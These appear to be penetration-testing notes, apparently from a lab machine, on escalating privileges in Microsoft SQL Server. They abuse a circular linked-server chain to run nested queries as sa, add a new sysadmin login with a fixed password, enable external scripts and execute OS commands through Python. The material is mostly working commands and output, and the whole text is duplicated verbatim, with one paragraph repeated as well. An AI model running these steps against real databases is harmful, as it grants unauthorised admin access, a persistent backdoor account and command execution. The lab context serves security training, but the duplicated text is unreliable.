Microsoft SQL Server

You just logged into a MSSQL server let's see how can we abuse it.

Linked Databases

SQL (external_user  dbo@POO_PUBLIC)> SELECT suser_name()
                
-------------   
external_user

Let's check if the user has sysadmin privileges on the databases. This can be done by querying the syslogins table

SQL (external_user  dbo@POO_PUBLIC)> select name,sysadmin from syslogins;
name            sysadmin   
-------------   --------   
sa                     1   

external_user          0

The database is found to have two users, sa and external_user . The current user doesn't have sysadmin privileges, which means we can't use xp_cmdshell to execute OS commands directly.

Let's check if there are any linked servers on the current database

SQL (external_user  dbo@POO_PUBLIC)> select srvname,isremote from sysservers;
srvname                    isremote   
------------------------   --------   
COMPATIBILITY\POO_PUBLIC          1   

COMPATIBILITY\POO_CONFIG          0

POO_CONFIG is a linked server. The EXEC statement can be used to execute queries on linked servers. Let's find out the user in whose context we are able to query the linked server.

SQL (external_user  dbo@POO_PUBLIC)> exec ('select current_user') at [COMPATIBILITY\POO_CONFIG];
                
-------------   
internal_user

Let's check if this user has sa privileges.

SQL (external_user  dbo@POO_PUBLIC)> EXEC ('select name,sysadmin from syslogins') at [COMPATIBILITY\POO_CONFIG];
name            sysadmin   
-------------   --------   
sa                     1   

internal_user          0

internal_user is also not a sysadmin. We can try to enumerate if the POO_CONFIG server has more links.

SQL (external_user  dbo@POO_PUBLIC)> EXEC ('select srvname,isremote from sysservers') at [COMPATIBILITY\POO_CONFIG];
srvname                    isremote   
------------------------   --------   
COMPATIBILITY\POO_CONFIG          1   

COMPATIBILITY\POO_PUBLIC          0

It's found that POO_CONFIG is in turn linked to POO_PUBLIC, making it a circular link. Let's use nested queries and look at the user we're running as.

SQL (external_user  dbo@POO_PUBLIC)> EXEC ('EXEC (''select suser_name()'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
     
--   
sa

It's found that POO_CONFIG is in turn linked to POO_PUBLIC, making it a circular link. Let's use nested queries and look at the user we're running as. A nested EXEC statement is used to find the username after crawling back from the POO_CONFIG link. The query returns sa , which means that the link allows us to execute queries as the sysadmin user

Adding new user

EXEC ('EXEC (''EXEC sp_addlogin ''''super'''', ''''abc123!'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];

EXEC ('EXEC (''EXEC sp_addsrvrolemember ''''super'''', ''''sysadmin'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];

Now we can login a super user and enable_xp_cmdshell.

Execute External Script

SQL> EXECUTE sp_configure 'external scripts enabled', 1;
SQL> RECONFIGURE

executing commands

EXEC sp_execute_external_script @language = N'Python', @script = N'import os; os.system("whoami");';

Microsoft SQL Server

You just logged into a MSSQL server let's see how can we abuse it.

Linked Databases

SQL (external_user  dbo@POO_PUBLIC)> SELECT suser_name()
                
-------------   
external_user

Let's check if the user has sysadmin privileges on the databases. This can be done by querying the syslogins table

SQL (external_user  dbo@POO_PUBLIC)> select name,sysadmin from syslogins;
name            sysadmin   
-------------   --------   
sa                     1   

external_user          0

The database is found to have two users, sa and external_user . The current user doesn't have sysadmin privileges, which means we can't use xp_cmdshell to execute OS commands directly.

Let's check if there are any linked servers on the current database

SQL (external_user  dbo@POO_PUBLIC)> select srvname,isremote from sysservers;
srvname                    isremote   
------------------------   --------   
COMPATIBILITY\POO_PUBLIC          1   

COMPATIBILITY\POO_CONFIG          0

POO_CONFIG is a linked server. The EXEC statement can be used to execute queries on linked servers. Let's find out the user in whose context we are able to query the linked server.

SQL (external_user  dbo@POO_PUBLIC)> exec ('select current_user') at [COMPATIBILITY\POO_CONFIG];
                
-------------   
internal_user

Let's check if this user has sa privileges.

SQL (external_user  dbo@POO_PUBLIC)> EXEC ('select name,sysadmin from syslogins') at [COMPATIBILITY\POO_CONFIG];
name            sysadmin   
-------------   --------   
sa                     1   

internal_user          0

internal_user is also not a sysadmin. We can try to enumerate if the POO_CONFIG server has more links.

SQL (external_user  dbo@POO_PUBLIC)> EXEC ('select srvname,isremote from sysservers') at [COMPATIBILITY\POO_CONFIG];
srvname                    isremote   
------------------------   --------   
COMPATIBILITY\POO_CONFIG          1   

COMPATIBILITY\POO_PUBLIC          0

It's found that POO_CONFIG is in turn linked to POO_PUBLIC, making it a circular link. Let's use nested queries and look at the user we're running as.

SQL (external_user  dbo@POO_PUBLIC)> EXEC ('EXEC (''select suser_name()'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
     
--   
sa

Adding new user

EXEC ('EXEC (''EXEC sp_addlogin ''''super'''', ''''abc123!'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];

EXEC ('EXEC (''EXEC sp_addsrvrolemember ''''super'''', ''''sysadmin'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];

Now we can login a super user and enable_xp_cmdshell.

Execute External Script

SQL> EXECUTE sp_configure 'external scripts enabled', 1;
SQL> RECONFIGURE

executing commands

EXEC sp_execute_external_script @language = N'Python', @script = N'import os; os.system("whoami");';